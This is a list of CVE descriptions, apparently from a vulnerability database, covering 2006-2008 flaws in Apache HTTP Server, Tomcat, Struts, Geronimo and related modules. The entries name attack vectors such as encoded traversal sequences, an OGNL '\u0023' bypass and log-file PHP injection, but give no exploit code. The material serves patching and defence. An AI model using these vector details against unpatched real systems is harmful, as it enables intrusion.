| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
14126| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
14127| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
14128| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
14129| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
14130| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
14131| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
14132| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
14133| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
14134| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
14135| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
14136| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
14137| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
14138| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
14139| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
14140| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
14141| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
14142| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
14143| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
14144| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
14145| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
14146| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
14147| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
14148| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
14149| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
14150| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
14151| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
14152| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
14153| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
14154| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
14155| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
14156| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
14157| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
14158| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
14159| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
14160| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
14161| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
14162| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
14163| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
14164| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
14165| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
14166| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
14167| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
14168| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
14169| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14170| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
14171| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
14172| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
14173| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
14174| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
14175| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
14176| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
14177| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
14178| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
14179| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
14180| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
14181| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
14182| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
14183| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
14184| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
14185| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
14186| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
14187| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
